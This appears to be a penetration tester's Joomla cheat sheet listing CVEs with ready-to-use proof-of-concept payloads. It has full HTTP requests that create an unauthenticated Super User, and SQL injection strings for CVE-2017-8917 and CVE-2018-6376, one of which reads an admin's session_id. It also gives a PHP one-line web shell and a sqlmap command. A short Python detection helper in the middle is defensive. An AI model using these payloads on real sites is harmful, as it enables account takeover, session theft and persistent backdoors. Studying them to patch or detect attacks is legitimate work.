Joomla

hashcat can be used to crack Joomla password hashes.

http://www.freebuf.com/sectool/164507.html

JoomScan: an open-source OWASP Joomla vulnerability scanner

https://paper.tuisec.win/detail/ab43a0937e648d9

(Affected versions 3.4.4 to 3.6.3) Analysis of the Joomla unauthenticated user creation vulnerability (CVE-2016-8870)

PoC:
Find the token in the HTML source of the site's home page,

then intercept the request with Burp Suite, modify it to match the packet below and send it; fill in your own cookie and the yourtoken value.

POST /index.php/component/users/?task=registration.register HTTP/1.1
...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryefGhagtDbsLTW5qI
...
Cookie: yourcookie

------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[name]"

attacker
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[username]"

attacker
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[password1]"

attacker
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[password2]"

attacker
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[email1]"

attacker@my.local
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[email2]"

attacker@my.local
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="option"

com_users
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="task"

user.register
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="yourtoken"

1
------WebKitFormBoundaryefGhagtDbsLTW5qI--

(3.4.4 to 3.6.3) Analysis of the Joomla unauthenticated privileged user creation vulnerability (CVE-2016-8869)

https://paper.seebug.org/88/

PoC:

POST /index.php/component/users/?task=registration.register HTTP/1.1
...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryefGhagtDbsLTW5qI
...
Cookie: yourcookie

------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[name]"

attacker2
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[username]"

attacker2
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[password1]"

attacker2
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[password2]"

attacker2
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[email1]"

attacker2@my.local
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[email2]"

attacker2@my.local
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="user[groups][]"

7
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="option"

com_users
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="task"

user.register
------WebKitFormBoundaryefGhagtDbsLTW5qI
Content-Disposition: form-data; name="yourtoken"

1
------WebKitFormBoundaryefGhagtDbsLTW5qI--

(1.6.0 - 3.6.4) Analysis of the Joomla privilege escalation vulnerability (CVE-2016-9838)

Achieves horizontal privilege escalation.

(1.5.0 to 3.6.5) CVE-2017-7985 & 7986: detailed analysis of two Joomla! XSS vulnerabilities (with exploit)

https://paper.tuisec.win/detail/e66d7bee425440a

[CVE-2017-8917] Joomla! 3.7.0 SQL injection analysis

PoC:

http://192.168.0.6/joomla370/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(1,concat(0x3e,database()),0)

Joomla! 3.7.0 core SQL injection vulnerability: exploitation details and script

https://paper.tuisec.win/detail/4d6b0130767fd51

Retrieve the table prefix:

updatexml(1,concat(0x5e24,(select%20*%20from%20(SELECT TABLE_NAME FROM%20information_schema.TABLE_CONSTRAINTS%20limit 1,1)aa%20),0x5e24),1)

Try using substring to read a specified range of the data and bypass the filter:

updatexml(1,concat(0x5e24,(select%20*%20from%20(SELECT%20substring(TABLE_NAME,1,6)%20FROM%20information_schema.TABLE_CONSTRAINTS%20limit 1,1)aa%20),0x5e24),1)
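A small detection helper, added here and not part of the original notes or of Joomla itself, covering the two PoCs above: it parses a captured multipart registration body and flags the user[groups][] field from the CVE-2016-8869 request (a frontend self-registration form never submits it), and checks a com_fields URL for SQL functions in list[fullordering] as in the CVE-2017-8917 PoC. Field names, the boundary and the sample body are taken from the PoCs; the host name is a placeholder and the sample body is constructed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# CVE-2016-8869: a frontend self-registration form never submits user[groups][];
# its presence in a registration POST is the tell-tale of group injection.
UNEXPECTED_REGISTRATION_FIELDS = {"user[groups][]", "user[groups]"}
# CVE-2017-8917: list[fullordering] should name a column and direction, never a SQL call.
SQL_MARKERS = re.compile(r"(updatexml|extractvalue|information_schema|concat\s*\()", re.I)


def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser: returns {field name: value}."""
    fields = {}
    for part in body.replace("\r\n", "\n").split("--" + boundary):
        part = part.strip()
        if not part or part == "--":  # preamble or closing delimiter
            continue
        headers, _, value = part.partition("\n\n")
        name = re.search(r'name="([^"]+)"', headers)
        if name:
            fields[name.group(1)] = value.strip()
    return fields


def registration_findings(body: str, boundary: str) -> list:
    """Return 'name=value' for registration fields a legitimate form would never send."""
    fields = parse_multipart(body, boundary)
    return [f"{k}={fields[k]}" for k in sorted(fields) if k in UNEXPECTED_REGISTRATION_FIELDS]


def is_com_fields_sqli(url: str) -> bool:
    """True when a com_fields request carries SQL in list[fullordering]."""
    params = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    if params.get("option") != "com_fields":
        return False
    return bool(SQL_MARKERS.search(params.get("list[fullordering]", "")))


# Constructed sample: the registration body shape from the CVE-2016-8869 PoC above.
BOUNDARY = "----WebKitFormBoundaryefGhagtDbsLTW5qI"
SAMPLE_BODY = "\r\n".join([
    "--" + BOUNDARY,
    'Content-Disposition: form-data; name="user[username]"', "", "attacker2",
    "--" + BOUNDARY,
    'Content-Disposition: form-data; name="user[groups][]"', "", "7",
    "--" + BOUNDARY,
    'Content-Disposition: form-data; name="task"', "", "user.register",
    "--" + BOUNDARY + "--", "",
])
```

Run the two checks over a WAF or reverse-proxy capture of registration POSTs and com_fields GETs; a hit on either is worth an alert on an unpatched 3.4.4-3.6.3 or 3.7.0 install.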

Joomla 3.7.0 com_fields SQL injection and getting a backend shell on Joomla 3.x

<?php $sl = create_function('', @$_REQUEST['70sec']);$sl();?>

(3.7.0 to 3.8.3) Analysis of CVE-2018-6376 - Joomla! second-order SQL injection

Affected versions: 3.7.0 to 3.8.3
https://www.notsosecure.com/analyzing-cve-2018-6376/
Register a Manager user named yesi, try to obtain the admin's session_id (the admin must be logged in), then access the application with Super Administrator privileges.
PoC:


Capture the save request for administrator/index.php?option=com_admin&view=profile&layout=edit&id=, append [0] to 'jform[params][admin_style]', and add the following
payload:

extractvalue(0x0a,concat(0x0a,(select session_id from nvybl_session where username='admin')))


Open administrator/index.php to read the returned session_id.

Using sqlmap:
Here the '*' in the payload serves as sqlmap's marker for where to inject its payloads, for example:

Copy the request captured with Burp into the file joomla.txt.

extractvalue(0x0a,concat(0x0a,(select @@version where 1=1 AND 5231 = 5231)))
extractvalue(0x0a,concat(0x0a,(select @@version where 1=1 AND 5231 = 1623)))
extractvalue(0x0a,concat(0x0a,(select @@version where 1=1 or 7231 = 7231)))
extractvalue(0x0a,concat(0x0a,(select @@version where 1=1 union all select NULL,NULL,NULL,'21231231232')))

sqlmap command line:

python sqlmap.py -r "joomla.txt" --dbms mysql  "http://192.168.0.6/joomla383/administrator/index.php" -D "joomla383" --dbs
